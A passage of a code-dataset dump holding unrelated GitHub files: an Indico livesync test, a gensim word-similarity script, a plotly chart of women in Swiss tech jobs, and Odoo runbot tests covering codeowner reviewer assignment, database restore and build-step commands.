telepot.Bot(os.environ['BOT_KEY'])\n","repo_name":"dimonb/gpswatch","sub_path":"telegram/functions/webhook/handlers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"73345678167","text":"import pytest\n\nfrom indico.modules.categories import Category\n\nfrom indico_livesync.models.queue import ChangeType, LiveSyncQueueEntry\nfrom indico_livesync.util import get_excluded_categories, obj_ref\n\n\nCATEGORY_PARENTS = {\n 0: None,\n 1: 0,\n 2: 0,\n 3: 2,\n 4: 3,\n 5: 3\n}\n\n\n@pytest.mark.usefixtures('dummy_agent')\ndef test_excluded_categories(mocker, monkeypatch, db, create_category):\n \"\"\"Test if category exclusions work.\"\"\"\n plugin = mocker.patch('indico_livesync.plugin.LiveSyncPlugin')\n plugin.settings.get.return_value = [{'id': 2}, {'id': 3}]\n\n categories = {}\n with db.session.no_autoflush:\n for cat_id in range(6):\n category = (create_category(cat_id, title=str(cat_id), protection_mode=0,\n parent=categories[CATEGORY_PARENTS[cat_id]])\n if cat_id else Category.get_root())\n categories[cat_id] = category\n db.session.add(category)\n db.session.flush()\n\n db.session.flush()\n\n for cat in categories.values():\n db = mocker.patch('indico_livesync.models.queue.db')\n LiveSyncQueueEntry.create({ChangeType.created}, obj_ref(cat), excluded_categories=get_excluded_categories())\n assert db.session.add.called == (cat.id not in {2, 3, 4, 5})\n","repo_name":"indico/indico-plugins","sub_path":"livesync/tests/queue_test.py","file_name":"queue_test.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"31"} +{"seq_id":"34969207211","text":"import pandas as pd\nimport gensim\nmodel = gensim.models.KeyedVectors.load_word2vec_format(\n 'Dataset/GoogleNews-vectors-negative300.bin', binary=True)\ndf = pd.read_csv('Dataset/wordsim353/combined.csv')\nsim = []\nfor i in range(len(df)):\n line = df.iloc[i]\n sim.append(model.similarity(line['Word 1'], line['Word 2']))\ndf['w2v'] = sim\nprint(df[['Human (mean)', 'w2v']].corr(method='spearman'))\n","repo_name":"yanamt/NLP-100knock","sub_path":"7shou/7-66.py","file_name":"7-66.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13863889364","text":"import pandas as pd\nimport numpy as np\nfrom pprint import pprint\nimport streamlit as st\nimport plotly.express as px \nimport plotly.graph_objects as go\nimport plotly.io as pio\n\n\ndef extractFormatDataFromExcel(filename: str, sheet_name: str)-> pd.DataFrame:\n # Read in data from excel file\n df_raw = pd.read_excel(filename, sheet_name=sheet_name)\n\n # Remove empty cells at the top\n df_raw = df_raw.iloc[2:,:]\n df = df_raw.copy()\n # Drop NA columns/rows if all are empty \n df.dropna(axis = 0, how = 'all', inplace=True)\n df.dropna(axis = 1, how = 'all', inplace=True)\n # Reset index to increase monotonically from 0\n df.reset_index(drop=True, inplace=True)\n\n # Unnamed: 1 is the column with the profession indexes\n # Unnamed: 2 is the column with the profession names \n # Unnamed: 3-131 are the columns with the profession stats\n # With year and quarter in the first and second rows\n df.rename(columns={\"Unnamed: 1\": \"Profession Index\"}, inplace=True)\n df.rename(columns={\"Unnamed: 2\": \"Profession Name\"}, inplace=True)\n\n # Column 1 - 61 --> profession stats start\n # 
Drop all rows (after date information) with NA for profession index (white space in Excel)\n    df = df[(df['Profession Name'].notna()) | (df.index < 2)].reset_index(drop=True)\n\n    # Fill year columns that are empty with the last non-NA value\n    # (explicit assignment: chained indexing like df.iloc[0][:].ffill(inplace=True) would modify a copy)\n    df.iloc[0] = df.iloc[0].ffill()\n\n    # Re-index dataframe so that the profession index is the index\n    df.set_index(\"Profession Index\", inplace=True)\n    # Drop totals (contain string like \"G-S\")\n    # Ensure column is string type\n    # str.contains cannot handle NaN values, so fill them with empty string\n    df = df[~df.iloc[:,0].astype(str).fillna('').str.contains(\"-\")]\n    # Then remove this column (don't need it anymore, can uniquely identify profession by index)\n    # Effectively remove the first column, as the profession indices are now the index\n    df = df.iloc[:, 1:]\n\n    # df = df.Year.apply(axis=1, func=lambda x: str(x) + \" Q\" + str(df.Quarter)))\n    # Transpose dataframe so that profession indices are columns\n    df = df.transpose()\n    # Rename year and quarter columns\n    df.rename(columns={\"Industries\\n Sections and Departments\": \"Year\"}, inplace=True)\n    df.rename(columns={np.nan: \"Quarter\"}, inplace=True)\n    # Reformat year and quarter columns ready for datetime conversion\n    # Quarterly information mapped to first month in quarter for datetime formatting\n    quarter_mapping = {\"I\": \"01\", \"II\": \"04\", \"III\": \"07\", \"IV\": \"10\"}\n    df.Quarter = df.Quarter.map(quarter_mapping)\n    df = df.assign(Period = df.Year.astype(str) + \"-\" + df.Quarter)\n    # Drop year and quarter columns \n    df.drop([\"Year\", \"Quarter\"], axis=1, inplace=True)\n\n    # Remove Profession Name row before converting Period to datetime\n    # Store the name information in a separate reference frame\n    reference_df = df.iloc[0:1].T.drop(\"Period\")\n    df.drop(\"Profession Name\", axis=0, inplace=True)\n    # Convert Period column to datetime type\n    df.Period = pd.to_datetime(df.Period, format='%Y-%m')\n    # Set Period column as index\n    df.set_index(\"Period\", inplace=True)\n\n    return df\n\nif __name__ == \"__main__\":\n\n    total_df = extractFormatDataFromExcel(\"./data/profession_stats.xlsx\", \"Total\")\n    female_df = extractFormatDataFromExcel(\"./data/profession_stats.xlsx\", \"Female\")\n    male_df = extractFormatDataFromExcel(\"./data/profession_stats.xlsx\", \"Male\")\n\n    # Dataframe with total number of people in tech and split by gender\n    # Tech career indices: 62-63, 71, 72\n    # Unfortunately 74 is combined with 73 & 75, so ignore this\n    totals_df = pd.DataFrame({\"Total\": total_df[\"62-63\"] + total_df[\"71\"] + total_df[\"72\"] + total_df[\"73-75\"], \n                              \"Female\": female_df[\"62-63\"] + female_df[\"71\"] + female_df[\"72\"] + female_df[\"73-75\"], \n                              \"Male\": male_df[\"62-63\"] + male_df[\"71\"] + male_df[\"72\"] + male_df[\"73-75\"]})\n\n    fig = go.Figure()\n    fig.add_trace(go.Scatter(x=totals_df.index, y=totals_df.Total, mode=None, fill='tozeroy', line=dict(color='rgb(126, 82, 160)'), name=\"Total\")) # Purple color with 0.5 translucency\n    fig.add_trace(go.Scatter(x=totals_df.index, y=totals_df.Female, mode='lines', fill='tozeroy', line=dict(color='rgb(17, 29, 74)', width=4), name=\"Women\")) # Green-blue color and thicker line\n    fig.update_layout(\n        title_text='Employees in Technical Roles in Switzerland (1991-2023)',\n        title_font=dict(size=32), # Change the font size of the title\n        legend=dict(x=0.02, y=1, font=dict(size=24)), # Move the legend to the top left corner and change its size\n        annotations=[\n            dict(\n                x=1,\n                y=-0.12,\n                showarrow=False,\n                text=\"Data source: 
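The quarter handling in the extraction function above maps Roman-numeral quarters to the first month of the quarter so `pd.to_datetime` can parse a plain `%Y-%m` string. The same idea in isolation, on toy data rather than the BFS sheet:

```python
import pandas as pd

df = pd.DataFrame({"Year": [1991, 1991], "Quarter": ["I", "IV"]})
quarter_mapping = {"I": "01", "II": "04", "III": "07", "IV": "10"}
df["Quarter"] = df["Quarter"].map(quarter_mapping)
period = pd.to_datetime(df["Year"].astype(str) + "-" + df["Quarter"], format="%Y-%m")
print(period.tolist())  # [Timestamp('1991-01-01'), Timestamp('1991-10-01')]
```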
https://www.bfs.admin.ch/bfs/de/home/statistiken/kataloge-datenbanken.assetdetail.27165007.html\",\n                xref=\"paper\",\n                yref=\"paper\",\n                font=dict(size=14)\n            )\n        ]\n    )\n    fig.update_xaxes(tickfont=dict(size=22)) # Change the font size of the x axis labels\n    fig.update_yaxes(tickfont=dict(size=22)) # Change the font size of the y axis labels\n    fig.show()\n    # pio.write_image(fig, 'images/tech_employees.png')\n\n    # Stats for presentation\n    perc_women_in_tech = int(round(totals_df[\"Female\"][-1]/totals_df[\"Total\"][-1] * 100))\n    print(f\"As of June 2023, {perc_women_in_tech}% of tech jobs are filled by women, with {int(round(totals_df.Total[-1]))} total tech jobs in Switzerland.\")\n","repo_name":"alexrollings/women_plusplus","sub_path":"data_generation/profession_stats.py","file_name":"profession_stats.py","file_ext":"py","file_size_in_byte":5611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5665415057","text":"# -*- coding: utf-8 -*-\nfrom unittest.mock import patch, mock_open\nfrom odoo import Command\nfrom odoo.tools import mute_logger\nfrom odoo.exceptions import UserError\nfrom odoo.addons.runbot.common import RunbotException\nfrom .common import RunbotCase\n\nclass TestBuildConfigStepCommon(RunbotCase):\n    def setUp(self):\n        super().setUp()\n\n        self.Build = self.env['runbot.build']\n        self.ConfigStep = self.env['runbot.build.config.step']\n        self.Config = self.env['runbot.build.config']\n\n        self.server_commit = self.Commit.create({\n            'name': 'dfdfcfcf',\n            'repo_id': self.repo_server.id\n        })\n        self.parent_build = self.Build.create({\n            'params_id': self.base_params.copy({'commit_link_ids': [(0, 0, {'commit_id': self.server_commit.id})]}).id,\n            'local_result': 'ok',\n        })\n        self.start_patcher('find_patcher', 'odoo.addons.runbot.common.find', 0)\n        self.start_patcher('findall_patcher', 'odoo.addons.runbot.models.build.BuildResult._parse_config', {})\n\n\nclass TestCodeowner(TestBuildConfigStepCommon):\n    def setUp(self):\n        super().setUp()\n        self.config_step = self.ConfigStep.create({\n            'name': 'test_codeowner',\n            'job_type': 'codeowner',\n            'fallback_reviewer': 'codeowner-team',\n        })\n        self.child_config = self.Config.create({'name': 'test_config'})\n        self.config_step.create_config_ids = [self.child_config.id]\n        self.team1 = self.env['runbot.team'].create({'name': \"Team1\", 'github_team': \"team_01\"})\n        self.team2 = self.env['runbot.team'].create({'name': \"Team2\", 'github_team': \"team_02\"})\n        self.env['runbot.codeowner'].create({'github_teams': 'team_py', 'project_id': self.project.id, 'regex': '.*.py'})\n        self.env['runbot.codeowner'].create({'github_teams': 'team_js', 'project_id': self.project.id, 'regex': '.*.js'})\n        self.server_commit.name = 'dfdfcfcf'\n\n    def test_codeowner_is_base(self):\n        self.dev_bundle.is_base = True\n        self.config_step._run_codeowner(self.parent_build)\n        self.assertEqual(self.parent_build.log_ids.mapped('message'), [\n            'Skipping base bundle',\n        ])\n        self.assertEqual(self.parent_build.local_result, 'ok')\n\n    def test_codeowner_check_limits(self):\n        self.parent_build.params_id.commit_link_ids[0].file_changed = 451\n        self.parent_build.params_id.commit_link_ids[0].base_ahead = 51\n        self.config_step._run_codeowner(self.parent_build)\n        self.assertEqual(self.parent_build.log_ids.mapped('message'), [\n            'Limit reached: dfdfcfcf has more than 50 commit (51) and will be skipped. 
Contact runbot team to increase your limit if it was intended',\n 'Limit reached: dfdfcfcf has more than 450 modified files (451) and will be skipped. Contact runbot team to increase your limit if it was intended',\n ])\n self.assertEqual(self.parent_build.local_result, 'ko')\n\n def test_codeowner_draft(self):\n self.dev_pr.draft = True\n self.config_step._run_codeowner(self.parent_build)\n self.assertEqual(self.parent_build.log_ids.mapped('message'), [\n 'Some pr are draft, skipping: 1234'\n ])\n self.assertEqual(self.parent_build.local_result, 'warn')\n\n def test_codeowner_draft_closed(self):\n self.dev_pr.draft = True\n self.dev_pr.alive = False\n self.assertEqual(self.parent_build.local_result, 'ok')\n\n def test_codeowner_forwardpot(self):\n self.dev_pr.pr_author = 'fw-bot'\n self.config_step._run_codeowner(self.parent_build)\n self.assertEqual(self.parent_build.log_ids.mapped('message'), [\n 'Ignoring forward port pull request: 1234'\n ])\n self.assertEqual(self.parent_build.local_result, 'ok')\n\n def test_codeowner_invalid_target(self):\n self.dev_pr.target_branch_name = 'master-other-dev-branch'\n self.config_step._run_codeowner(self.parent_build)\n self.assertEqual(self.parent_build.log_ids.mapped('message'), [\n 'Some pr have an invalid target: 1234'\n ])\n self.assertEqual(self.parent_build.local_result, 'ko')\n\n def test_codeowner_pr_duplicate(self):\n second_pr = self.Branch.create({\n 'name': '1235',\n 'is_pr': True,\n 'remote_id': self.remote_server.id,\n 'target_branch_name': self.dev_bundle.base_id.name,\n 'pull_head_remote_id': self.remote_server.id,\n })\n second_pr.pull_head_name = f'{self.remote_server.owner}:{self.dev_branch.name}'\n second_pr.bundle_id = self.dev_bundle.id\n self.config_step._run_codeowner(self.parent_build)\n self.assertEqual(self.parent_build.log_ids.mapped('message'), [\n \"More than one open pr in this bundle for server: ['1234', '1235']\"\n ])\n self.assertEqual(self.parent_build.local_result, 'ko')\n\n def test_get_module(self):\n self.assertEqual(self.repo_server.addons_paths, 'addons,core/addons')\n self.assertEqual('module1', self.repo_server._get_module('server/core/addons/module1/some/file.py'))\n self.assertEqual('module1', self.repo_server._get_module('server/addons/module1/some/file.py'))\n self.assertEqual('module_addons', self.repo_addons._get_module('addons/module_addons/some/file.py'))\n self.assertEqual(None, self.repo_server._get_module('server/core/module1/some/file.py'))\n self.assertEqual(None, self.repo_server._get_module('server/core/module/some/file.py'))\n\n def test_codeowner_regex_multiple(self):\n self.diff = 'file.js\\nfile.py\\nfile.xml'\n self.config_step._run_codeowner(self.parent_build)\n messages = self.parent_build.log_ids.mapped('message')\n self.assertEqual(messages[1], 'Checking 2 codeowner regexed on 3 files')\n self.assertEqual(messages[2], 'Adding team_js to reviewers for file [server/file.js](https://False/blob/dfdfcfcf/file.js)')\n self.assertEqual(messages[3], 'Adding team_py to reviewers for file [server/file.py](https://False/blob/dfdfcfcf/file.py)')\n self.assertEqual(messages[4], 'Adding codeowner-team to reviewers for file [server/file.xml](https://False/blob/dfdfcfcf/file.xml)')\n self.assertEqual(messages[5], 'Requesting review for pull request [base/server:1234](https://example.com/base/server/pull/1234): codeowner-team, team_js, team_py')\n self.assertEqual(self.dev_pr.reviewers, 'codeowner-team,team_js,team_py')\n\n def test_codeowner_regex_some_already_on(self):\n self.diff = 
'file.js\\nfile.py\\nfile.xml'\n self.dev_pr.reviewers = 'codeowner-team,team_js'\n self.config_step._run_codeowner(self.parent_build)\n messages = self.parent_build.log_ids.mapped('message') \n self.assertEqual(messages[5], 'Requesting review for pull request [base/server:1234](https://example.com/base/server/pull/1234): team_py')\n\n def test_codeowner_regex_all_already_on(self):\n self.diff = 'file.js\\nfile.py\\nfile.xml'\n self.dev_pr.reviewers = 'codeowner-team,team_js,team_py'\n self.config_step._run_codeowner(self.parent_build)\n messages = self.parent_build.log_ids.mapped('message') \n self.assertEqual(messages[5], 'All reviewers are already on pull request [base/server:1234](https://example.com/base/server/pull/1234)')\n\n def test_codeowner_author_in_team(self):\n self.diff = 'file.js\\nfile.py\\nfile.xml'\n self.team1.github_team = 'team_py'\n self.team1.github_logins = 'some_member,another_member'\n self.team1.skip_team_pr = True\n self.dev_pr.pr_author = 'some_member'\n self.config_step._run_codeowner(self.parent_build)\n messages = self.parent_build.log_ids.mapped('message')\n self.assertEqual(messages[5], \"Skipping teams ['team_py'] since author is part of the team members\")\n self.assertEqual(messages[6], 'Requesting review for pull request [base/server:1234](https://example.com/base/server/pull/1234): codeowner-team, team_js')\n self.assertEqual(self.dev_pr.reviewers, 'codeowner-team,team_js,team_py')\n\n def test_codeowner_ownership_base(self):\n module1 = self.env['runbot.module'].create({'name': \"module1\"})\n self.env['runbot.module.ownership'].create({'team_id': self.team1.id, 'module_id': module1.id})\n self.diff = '\\n'.join([\n 'core/addons/module1/some/file.py',\n ])\n self.config_step._run_codeowner(self.parent_build)\n messages = self.parent_build.log_ids.mapped('message')\n self.assertEqual(\n messages[2], \n 'Adding team_01, team_py to reviewers for file [server/core/addons/module1/some/file.py](https://False/blob/dfdfcfcf/core/addons/module1/some/file.py)'\n )\n\n def test_codeowner_ownership_fallback(self):\n module1 = self.env['runbot.module'].create({'name': \"module1\"})\n self.env['runbot.module.ownership'].create({'team_id': self.team1.id, 'module_id': module1.id, 'is_fallback': True})\n self.diff = '\\n'.join([\n 'core/addons/module1/some/file.py',\n ])\n self.config_step._run_codeowner(self.parent_build)\n messages = self.parent_build.log_ids.mapped('message')\n self.assertEqual(\n messages[2], \n 'Adding team_py to reviewers for file [server/core/addons/module1/some/file.py](https://False/blob/dfdfcfcf/core/addons/module1/some/file.py)'\n )\n\n def test_codeowner_ownership(self):\n module1 = self.env['runbot.module'].create({'name': \"module1\"})\n module2 = self.env['runbot.module'].create({'name': \"module2\"})\n self.env['runbot.module.ownership'].create({'team_id': self.team1.id, 'module_id': module1.id})\n self.env['runbot.module.ownership'].create({'team_id': self.team2.id, 'module_id': module2.id})\n self.diff = '\\n'.join([\n 'core/addons/module1/some/file.py',\n 'core/addons/module2/some/file.ext',\n 'core/addons/module3/some/file.js',\n 'core/addons/module4/some/file.txt',\n ])\n self.config_step._run_codeowner(self.parent_build)\n messages = self.parent_build.log_ids.mapped('message')\n self.assertEqual(messages, [\n 'PR [base/server:1234](https://example.com/base/server/pull/1234) found for repo **server**',\n 'Checking 2 codeowner regexed on 4 files',\n 'Adding team_01, team_py to reviewers for file 
[server/core/addons/module1/some/file.py](https://False/blob/dfdfcfcf/core/addons/module1/some/file.py)',\n 'Adding team_02 to reviewers for file [server/core/addons/module2/some/file.ext](https://False/blob/dfdfcfcf/core/addons/module2/some/file.ext)',\n 'Adding team_js to reviewers for file [server/core/addons/module3/some/file.js](https://False/blob/dfdfcfcf/core/addons/module3/some/file.js)',\n 'Adding codeowner-team to reviewers for file [server/core/addons/module4/some/file.txt](https://False/blob/dfdfcfcf/core/addons/module4/some/file.txt)',\n 'Requesting review for pull request [base/server:1234](https://example.com/base/server/pull/1234): codeowner-team, team_01, team_02, team_js, team_py'\n ])\n\nclass TestBuildConfigStepRestore(TestBuildConfigStepCommon):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.restore_config_step = cls.env['runbot.build.config.step'].create({\n 'name': 'restore',\n 'job_type': 'restore',\n })\n cls.restore_config = cls.env['runbot.build.config'].create({\n 'name': 'Restore',\n 'step_order_ids': [\n (0, 0, {'sequence': 10, 'step_id': cls.restore_config_step.id}),\n ],\n })\n\n def test_restore(self):\n # setup master branch\n master_batch = self.master_bundle._force()\n with mute_logger('odoo.addons.runbot.models.batch'):\n master_batch._prepare()\n reference_slot = master_batch.slot_ids\n trigger = reference_slot.trigger_id\n self.assertEqual(trigger.name, 'Server trigger', 'Just checking that we have a single slot')\n reference_build = reference_slot.build_id\n self.env['runbot.database'].create({\n 'build_id': reference_build.id,\n 'name': f'{reference_build.dest}-suffix',\n })\n reference_build.local_state = 'done'\n reference_build.local_result = 'ok'\n\n # custom trigger\n config_data = {\n 'dump_trigger_id': trigger.id,\n 'dump_suffix': 'suffix',\n }\n self.env['runbot.bundle.trigger.custom'].create({\n 'bundle_id': self.dev_bundle.id,\n 'config_id': self.restore_config.id,\n 'trigger_id': trigger.id,\n 'config_data': config_data,\n })\n\n # create dev build\n dev_batch = self.dev_bundle._force()\n with mute_logger('odoo.addons.runbot.models.batch'):\n dev_batch._prepare()\n dev_batch.base_reference_batch_id = master_batch # not tested, this is not the purpose of this test\n dev_build = dev_batch.slot_ids.build_id\n self.assertEqual(dev_build.params_id.config_data, config_data)\n\n docker_params = self.restore_config_step._run_restore(dev_build)\n cmds = docker_params['cmd'].split(' && ')\n self.assertEqual(f'wget https://False/runbot/static/build/{reference_build.dest}/logs/{reference_build.dest}-suffix.zip', cmds[2])\n self.assertEqual(f'psql -q {dev_build.dest}-suffix < dump.sql', cmds[8])\n self.called=True\n\n\n\nclass TestBuildConfigStepCreate(TestBuildConfigStepCommon):\n\n def setUp(self):\n super().setUp()\n self.config_step = self.ConfigStep.create({\n 'name': 'test_step',\n 'job_type': 'create_build',\n 'number_builds': 2,\n })\n self.child_config = self.Config.create({'name': 'test_config'})\n self.config_step.create_config_ids = [self.child_config.id]\n\n def test_config_step_create_results(self):\n \"\"\" Test child builds are taken into account\"\"\"\n\n self.config_step._run_create_build(self.parent_build)\n self.assertEqual(len(self.parent_build.children_ids), 2, 'Two sub-builds should have been generated')\n\n # check that the result will be ignored by parent build\n for child_build in self.parent_build.children_ids:\n self.assertFalse(child_build.orphan_result)\n child_build.local_result = 'ko'\n 
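The codeowner tests above fix the expected behavior: each changed file is matched against the configured regexes (plus module ownership), and files no rule covers fall back to a catch-all team. A reduced sketch of that resolution logic, with made-up rules and team names rather than runbot's actual models:

```python
import re

# Illustrative rules mirroring the test fixtures, not runbot's records.
codeowners = [(r".*\.py$", "team_py"), (r".*\.js$", "team_js")]
fallback = "codeowner-team"

def reviewers_for(files):
    teams = set()
    for path in files:
        matched = {team for pattern, team in codeowners if re.match(pattern, path)}
        teams |= matched or {fallback}  # no rule matched: use the fallback team
    return sorted(teams)

print(reviewers_for(["file.py", "file.js", "file.xml"]))
# ['codeowner-team', 'team_js', 'team_py']
```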
self.assertEqual(child_build.global_result, 'ko')\n\n\n self.assertEqual(self.parent_build.global_result, 'ko')\n\n def test_config_step_create(self):\n \"\"\" Test the config step of type create \"\"\"\n self.config_step.make_orphan = True\n self.config_step._run_create_build(self.parent_build)\n self.assertEqual(len(self.parent_build.children_ids), 2, 'Two sub-builds should have been generated')\n\n # check that the result will be ignored by parent build\n for child_build in self.parent_build.children_ids:\n self.assertTrue(child_build.orphan_result, 'An orphan result config step should mark the build as orphan_result')\n child_build.local_result = 'ko'\n # child_build._update_:globals()\n\n self.assertEqual(self.parent_build.global_result, 'ok')\n\n def test_config_step_create_child_data(self):\n \"\"\" Test the config step of type create \"\"\"\n self.config_step.number_builds = 5\n json_config = {'child_data': [{'extra_params': '-i m1'}, {'extra_params': '-i m2'}]}\n self.parent_build = self.Build.create({\n 'params_id': self.base_params.create({\n 'version_id': self.version_13.id,\n 'project_id': self.project.id,\n 'config_id': self.default_config.id,\n 'config_data': json_config,\n }).id,\n })\n\n self.config_step._run_create_build(self.parent_build)\n self.assertEqual(len(self.parent_build.children_ids), 10, '10 build should have been generated')\n\n # check that the result will be ignored by parent build\n for child_build in self.parent_build.children_ids:\n self.assertTrue(child_build.config_id, self.child_config)\n\n def test_config_step_create_child_data_unique(self):\n \"\"\" Test the config step of type create \"\"\"\n json_config = {'child_data': {'extra_params': '-i m1'}, 'number_build': 5}\n self.parent_build = self.Build.create({\n 'params_id': self.base_params.create({\n 'version_id': self.version_13.id,\n 'project_id': self.project.id,\n 'config_id': self.default_config.id,\n 'config_data': json_config,\n }).id,\n })\n\n self.config_step._run_create_build(self.parent_build)\n self.assertEqual(len(self.parent_build.children_ids), 5, '5 build should have been generated')\n\n # check that the result will be ignored by parent build\n for child_build in self.parent_build.children_ids:\n self.assertTrue(child_build.config_id, self.child_config)\n\n def test_config_step_create_child_data_with_config(self):\n \"\"\" Test the config step of type create \"\"\"\n\n test_config_1 = self.Config.create({'name': 'test_config1'})\n test_config_2 = self.Config.create({'name': 'test_config2'})\n\n self.config_step.number_builds = 5\n json_config = {'child_data': [{'extra_params': '-i m1', 'config_id': test_config_1.id}, {'config_id': test_config_2.id}]}\n self.parent_build = self.Build.create({\n 'params_id': self.base_params.create({\n 'version_id': self.version_13.id,\n 'project_id': self.project.id,\n 'config_id': self.default_config.id,\n 'config_data': json_config,\n }).id,\n })\n\n self.config_step._run_create_build(self.parent_build)\n self.assertEqual(len(self.parent_build.children_ids), 10, '10 build should have been generated')\n self.assertEqual(len(self.parent_build.children_ids.filtered(lambda b: b.config_id == test_config_1)), 5)\n self.assertEqual(len(self.parent_build.children_ids.filtered(lambda b: b.config_id == test_config_2)), 5)\n\n\n\n\nclass TestBuildConfigStep(TestBuildConfigStepCommon):\n\n def test_config_step_raises(self):\n \"\"\" Test a config raises when run step position is wrong\"\"\"\n\n run_step = self.ConfigStep.create({\n 'name': 'run_step',\n 
'job_type': 'run_odoo',\n })\n\n create_step = self.ConfigStep.create({\n 'name': 'test_step',\n 'job_type': 'create_build',\n })\n\n config = self.Config.create({'name': 'test_config'})\n\n # test that the run_odoo step has to be the last one\n with self.assertRaises(UserError):\n config.write({\n 'step_order_ids': [\n (0, 0, {'sequence': 10, 'step_id': run_step.id}),\n (0, 0, {'sequence': 15, 'step_id': create_step.id}),\n ]\n })\n\n # test that the run_odoo step should be preceded by an install step\n with self.assertRaises(UserError):\n config.write({\n 'step_order_ids': [\n (0, 0, {'sequence': 15, 'step_id': run_step.id}),\n (0, 0, {'sequence': 10, 'step_id': create_step.id}),\n ]\n })\n\n def test_config_step_copy(self):\n \"\"\" Test a config copy with step_order_ids \"\"\"\n\n install_step = self.ConfigStep.create({\n 'name': 'install_step',\n 'job_type': 'install_odoo'\n })\n\n run_step = self.ConfigStep.create({\n 'name': 'run_step',\n 'job_type': 'run_odoo',\n })\n\n create_step = self.ConfigStep.create({\n 'name': 'test_step',\n 'job_type': 'create_build',\n })\n\n config = self.Config.create({'name': 'test_config'})\n StepOrder = self.env['runbot.build.config.step.order']\n # Creation order is important to reproduce the Odoo copy bug/feature :-)\n StepOrder.create({'sequence': 15, 'step_id': run_step.id, 'config_id': config.id})\n StepOrder.create({'sequence': 10, 'step_id': create_step.id, 'config_id': config.id})\n StepOrder.create({'sequence': 12, 'step_id': install_step.id, 'config_id': config.id})\n\n dup_config = config.copy()\n self.assertEqual(dup_config.step_order_ids.mapped('step_id'), config.step_order_ids.mapped('step_id'))\n\n @patch('odoo.addons.runbot.models.build.BuildResult._checkout')\n def test_coverage(self, mock_checkout):\n\n config_step = self.ConfigStep.create({\n 'name': 'coverage',\n 'job_type': 'install_odoo',\n 'coverage': True\n })\n\n def docker_run(cmd, log_path, *args, **kwargs):\n self.assertEqual(cmd.pres, [['sudo', 'pip3', 'install', '-r', 'server/requirements.txt']])\n self.assertEqual(cmd.cmd[:10], ['python3', '-m', 'coverage', 'run', '--branch', '--source', '/data/build', '--omit', '*__manifest__.py', 'server/server.py'])\n self.assertIn(['python3', '-m', 'coverage', 'html', '-d', '/data/build/coverage', '--ignore-errors'], cmd.posts)\n self.assertIn(['python3', '-m', 'coverage', 'xml', '-o', '/data/build/logs/coverage.xml', '--ignore-errors'], cmd.posts)\n self.assertEqual(log_path, 'dev/null/logpath')\n\n self.patchers['docker_run'].side_effect = docker_run\n config_step._run_install_odoo(self.parent_build)\n\n @patch('odoo.addons.runbot.models.build.BuildResult._checkout')\n def test_dump(self, mock_checkout):\n config_step = self.ConfigStep.create({\n 'name': 'all',\n 'job_type': 'install_odoo',\n })\n\n def docker_run(cmd, log_path, *args, **kwargs):\n dest = self.parent_build.dest\n self.assertEqual(cmd.cmd[:2], ['python3', 'server/server.py'])\n self.assertEqual(cmd.finals[0], ['pg_dump', '%s-all' % dest, '>', '/data/build/logs/%s-all//dump.sql' % dest])\n self.assertEqual(cmd.finals[1], ['cp', '-r', '/data/build/datadir/filestore/%s-all' % dest, '/data/build/logs/%s-all//filestore/' % dest])\n self.assertEqual(cmd.finals[2], ['cd', '/data/build/logs/%s-all/' % dest, '&&', 'zip', '-rmq9', '/data/build/logs/%s-all.zip' % dest, '*'])\n self.assertEqual(log_path, 'dev/null/logpath')\n\n self.patchers['docker_run'].side_effect = docker_run\n\n config_step._run_install_odoo(self.parent_build)\n\n def get_test_tags(self, params):\n cmds 
= params['cmd'].build().split(' && ')\n self.assertEqual(cmds[1].split(' server/server.py')[0], 'python3')\n return cmds[1].split('--test-tags ')[1].split(' ')[0]\n\n @patch('odoo.addons.runbot.models.build.BuildResult._parse_config')\n @patch('odoo.addons.runbot.models.build.BuildResult._checkout')\n def test_install_tags(self, mock_checkout, parse_config):\n parse_config.return_value = {'--test-enable', '--test-tags'}\n config_step = self.ConfigStep.create({\n 'name': 'all',\n 'job_type': 'install_odoo',\n 'enable_auto_tags': False,\n 'test_tags': '/module,:class.method',\n })\n self.env['runbot.build.error'].create({\n 'content': 'foo',\n 'random': True,\n 'test_tags': ':otherclass.othertest'\n })\n params = config_step._run_install_odoo(self.parent_build)\n tags = self.get_test_tags(params)\n self.assertEqual(tags, '/module,:class.method')\n\n config_step.enable_auto_tags = True\n params = config_step._run_install_odoo(self.parent_build)\n tags = self.get_test_tags(params)\n self.assertEqual(tags, '/module,:class.method,-:otherclass.othertest')\n\n @patch('odoo.addons.runbot.models.build.BuildResult._parse_config')\n @patch('odoo.addons.runbot.models.build.BuildResult._checkout')\n def test_install_custom_tags(self, mock_checkout, parse_config):\n parse_config.return_value = {'--test-enable', '--test-tags'}\n config_step = self.ConfigStep.create({\n 'name': 'all',\n 'job_type': 'install_odoo',\n 'enable_auto_tags': True,\n })\n self.env['runbot.build.error'].create({\n 'content': 'foo',\n 'random': True,\n 'test_tags': ':otherclass.othertest'\n })\n\n child = self.parent_build._add_child({'config_data': {'test_tags': '-at_install,/module1,/module2'}})\n\n params = config_step._run_install_odoo(child)\n tags = self.get_test_tags(params)\n self.assertEqual(tags, '-at_install,/module1,/module2,-:otherclass.othertest')\n\n\n @patch('odoo.addons.runbot.models.build.BuildResult._checkout')\n def test_db_name(self, mock_checkout):\n config_step = self.ConfigStep.create({\n 'name': 'default',\n 'job_type': 'install_odoo',\n 'custom_db_name': 'custom',\n })\n call_count = 0\n assert_db_name = 'custom'\n\n def docker_run(cmd, log_path, *args, **kwargs):\n db_suffix = cmd.cmd[cmd.index('-d')+1].split('-')[-1]\n self.assertEqual(db_suffix, assert_db_name)\n nonlocal call_count\n call_count += 1\n\n self.patchers['docker_run'].side_effect = docker_run\n\n config_step._run_step(self.parent_build)()\n\n assert_db_name = 'custom_build'\n parent_build_params = self.parent_build.params_id.copy({'config_data': {'db_name': 'custom_build'}})\n parent_build = self.parent_build.copy({'params_id': parent_build_params.id})\n config_step._run_step(parent_build)()\n\n config_step = self.ConfigStep.create({\n 'name': 'run_test',\n 'job_type': 'run_odoo',\n 'custom_db_name': 'custom',\n })\n config_step._run_step(parent_build)()\n\n self.assertEqual(call_count, 3)\n\n 